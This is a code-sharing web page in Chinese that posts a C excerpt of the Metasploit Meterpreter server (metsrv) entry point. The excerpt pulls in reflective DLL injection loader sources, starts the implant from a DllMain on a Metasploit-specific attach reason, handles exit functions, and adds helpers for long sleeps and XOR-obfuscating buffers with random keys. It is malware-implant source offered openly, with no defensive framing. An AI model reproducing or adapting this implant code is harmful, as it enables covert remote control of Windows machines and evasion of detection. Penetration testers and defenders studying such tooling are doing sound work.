用户注册



邮箱:

密码:

用户登录


邮箱:

密码:
记住登录一个月忘记密码?

发表随想


还能输入:200字
云代码 - c代码库

meta

2022-07-29 作者: 云代码会员举报

[c]代码库

#include "metsrv.h"
 
#include <windows.h> // for EXCEPTION_ACCESS_VIOLATION
#include <excpt.h>
 
#define UnpackAndLinkLibs(p, s)
 
#define InitAppInstance() { if( hAppInstance == NULL ) hAppInstance = GetModuleHandle( NULL ); }
 
 
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#define RDIDLL_NOEXPORT
#include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include "../ReflectiveDLLInjection/inject/src/GetProcAddressR.c"
#include "../ReflectiveDLLInjection/inject/src/LoadLibraryR.c"
 
DWORD Init(MetsrvConfig* metConfig)
{
    INIT_LOGGING(metConfig)
 
    // if hAppInstance is still == NULL it means that we havent been
    // reflectivly loaded so we must patch in the hAppInstance value
    // for use with loading server extensions later.
    InitAppInstance();
 
    // In the case of metsrv payloads, the parameter passed to init is NOT a socket, it's actually
    // a pointer to the metserv configuration, so do a nasty cast and move on.
    dprintf("[METSRV] Getting ready to init with config %p", metConfig);
    DWORD result = server_setup(metConfig);
 
    dprintf("[METSRV] Exiting with %08x", metConfig->session.exit_func);
 
    // We also handle exit func directly in metsrv now because the value is added to the
    // configuration block and we manage to save bytes in the stager/header as well.
    switch (metConfig->session.exit_func)
    {
    case EXITFUNC_SEH:
        SetUnhandledExceptionFilter(NULL);
        break;
    case EXITFUNC_THREAD:
        ExitThread(0);
        break;
    case EXITFUNC_PROCESS:
        ExitProcess(0);
        break;
    default:
        break;
    }
    return result;
}
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    BOOL bReturnValue = TRUE;
 
    switch (dwReason)
    {
    case DLL_METASPLOIT_ATTACH:
        bReturnValue = Init((MetsrvConfig*)lpReserved);
        break;
    case DLL_QUERY_HMODULE:
        if (lpReserved != NULL)
            *(HMODULE*)lpReserved = hAppInstance;
        break;
    case DLL_PROCESS_ATTACH:
        hAppInstance = hinstDLL;
        break;
    case DLL_PROCESS_DETACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
        break;
    }
    return bReturnValue;
}
 
#define SLEEP_MAX_SEC (MAXDWORD / 1000)
 
/*!
 * @brief Returns a unix timestamp in UTC.
 * @return Integer value representing the UTC Unix timestamp of the current time.
 */
int current_unix_timestamp(void) {
    SYSTEMTIME system_time;
    FILETIME file_time;
    ULARGE_INTEGER ularge;
 
    GetSystemTime(&system_time);
    SystemTimeToFileTime(&system_time, &file_time);
 
    ularge.LowPart = file_time.dwLowDateTime;
    ularge.HighPart = file_time.dwHighDateTime;
    return (long)((ularge.QuadPart - 116444736000000000) / 10000000L);
}
 
/*!
 * @brief Sleep for the given number of seconds.
 * @param seconds DWORD value representing the number of seconds to sleep.
 * @remark This was implemented so that extended sleep times can be used (beyond the
 *         49 day limit imposed by Sleep()).
 */
VOID sleep(DWORD seconds)
{
    while (seconds > SLEEP_MAX_SEC)
    {
        Sleep(SLEEP_MAX_SEC * 1000);
        seconds -= SLEEP_MAX_SEC;
    }
    Sleep(seconds * 1000);
}
 
VOID xor_bytes(BYTE xorKey[4], LPBYTE buffer, DWORD bufferSize)
{
    dprintf("[XOR] XORing %u bytes with key %02x%02x%02x%02x", bufferSize, xorKey[0], xorKey[1], xorKey[2], xorKey[3]);
    for (DWORD i = 0; i < bufferSize; ++i)
    {
        buffer[i] ^= xorKey[i % 4];
    }
}
 
VOID rand_xor_key(BYTE buffer[4])
{
    static BOOL initialised = FALSE;
    if (!initialised)
    {
        srand((unsigned int)time(NULL));
        initialised = TRUE;
    }
 
    buffer[0] = (rand() % 254) + 1;
    buffer[1] = (rand() % 254) + 1;
    buffer[2] = (rand() % 254) + 1;
    buffer[3] = (rand() % 254) + 1;
}
 
BOOL is_null_guid(BYTE guid[sizeof(GUID)])
{
    return memcmp(guid, "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", sizeof(GUID)) == 0 ? TRUE : FALSE;
}

[源代码打包下载]




网友评论    (发表评论)


发表评论:

评论须知:

  • 1、评论每次加2分,每天上限为30;
  • 2、请文明用语,共同创建干净的技术交流环境;
  • 3、若被发现提交非法信息,评论将会被删除,并且给予扣分处理,严重者给予封号处理;
  • 4、请勿发布广告信息或其他无关评论,否则将会删除评论并扣分,严重者给予封号处理。


扫码下载

加载中,请稍后...

输入口令后可复制整站源码

加载中,请稍后...